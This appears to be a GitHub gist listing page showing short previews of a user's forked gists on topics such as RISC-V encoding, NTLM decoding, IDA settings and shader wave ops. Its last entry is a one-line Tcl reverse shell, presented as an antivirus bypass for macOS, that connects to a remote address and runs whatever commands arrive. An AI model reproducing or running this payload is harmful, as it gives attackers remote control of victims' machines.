Skip to content

Instantly share code, notes, and snippets.

@gmh5225
gmh5225 / world-id-protocol_attestation.log
Created February 22, 2026 02:07 — forked from dcbuild3r/world-id-protocol_attestation.log
Attestation for world-id-protocol MPC Phase 2 Trusted Setup ceremony
Hey, I'm dcbuild3r-19372745 and I have finalized the world-id-protocol MPC Phase2 Trusted Setup ceremony.
The following are my contribution signatures:
Circuit # 1 (oprfkeygenproof13)
Contributor # final
Contribution Hash: 4d431429 12461b17 2e14232b 6b1c878b
48248de8 b8f1340c 18e93c6d cf2c4b10
f447a3d7 8be20b16 772080d6 2cefb8e1
248bfc91 816d34da 07bacde2 5c384fd2
@gmh5225
gmh5225 / README.md
Created February 22, 2026 01:25 — forked from camel-cdr/README.md
Visualizing the RISC-V Instruction Set

Visualizing the RISC-V Instruction Set

Earlier today, I came across the blog post "Visualizing the ARM64 Instruction Set" and got inspired to give it a shot my self.

After hacking together a quick script and fiddling with the bit order and colors for way too long, I managed to create a decent visualization of the RISC-V instruction encoding. You can find my code below.

The following graphics cover the 64-bit part of the RISC-V ISA, including all ratified 64-bit extensions, with opcodes extracted from the riscv/riscv-opcodes repo.

I mapped the opcodes to 2D coordinates with a Morton space-filling curve.

@gmh5225
gmh5225 / README.md
Created February 2, 2026 05:20 — forked from emschwartz/README.md
The Most Popular Blogs of Hacker News in 2025

This is an OPML version of the HN Popularity Contest results for 2025, for importing into RSS feed readers.

@gmh5225
gmh5225 / clawdbot-selfcheck-en.md
Created January 26, 2026 15:50 — forked from zhixianio/clawdbot-selfcheck-en.md
Clawdbot Security Self-Check / Clawdbot 安全自检

Clawdbot Security Self-Check

Help me check my Clawdbot security posture. We'll go step by step—wait for my reply before continuing to the next step.


Step 1: Runtime Environment

What device is Clawdbot running on?

IO_STATUS_BLOCK iosb;
UNICODE_STRING path = RTL_CONSTANT_STRING(L"\\SystemRoot\\System32\\ntdll.dll");
OBJECT_ATTRIBUTES attr = RTL_CONSTANT_OBJECT_ATTRIBUTES(&path, 0);
HANDLE file, section;
// only FILE_EXECUTE
NTSTATUS status = NtCreateFile(&file, FILE_EXECUTE, &attr, &iosb, nullptr, 0, 0, FILE_OPEN, 0, nullptr, 0);
printf("NtCreateFile %lx\n", status);
// request PAGE_EXECUTE when creating - the only permission compatible with FILE_EXECUTE.
@gmh5225
gmh5225 / ntlmdecoder.py
Created January 20, 2026 10:33 — forked from tingtho/ntlmdecoder.py
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <http://davenport.sourceforge.net/ntlm.html>
## with additional detail subsequently added from the official protocol spec:
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
##
@gmh5225
gmh5225 / ida_configuration.md
Created January 6, 2026 04:47 — forked from you0708/ida_configuration.md
自分的 IDA Pro のオススメ設定

自分的 IDA のオススメ設定

逆アセンブル画面メインで使う自分の IDA の設定。設定の保存方法は以下のとおり。

  • 設定した後に、Windows -> Save desktop... -> Default で保存
    • ウインドウ配置だけでなく、表示に関する多くの設定はこれで保存可能
  • $IDADIR/cfg 内の設定値を参照し、それらの設定を変更した内容だけを記載した .cfg ファイルを $IDAUSR/cfg に配置
@gmh5225
gmh5225 / FastUniformLoadWithWaveOps.txt
Created January 6, 2026 04:40 — forked from sebbbi/FastUniformLoadWithWaveOps.txt
Fast uniform load with wave ops (up to 64x speedup)
In shader programming, you often run into a problem where you want to iterate an array in memory over all pixels in a compute shader
group (tile). Tiled deferred lighting is the most common case. 8x8 tile loops over a light list culled for that tile.
Simplified HLSL code looks like this:
Buffer<float4> lightDatas;
Texture2D<uint2> lightStartCounts;
RWTexture2D<float4> output;
[numthreads(8, 8, 1)]
@gmh5225
gmh5225 / reverse_shell.tcl
Created December 20, 2025 04:10 — forked from tokyoneon/reverse_shell.tcl
Use One Tclsh Command to Bypass Antivirus #macOS
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;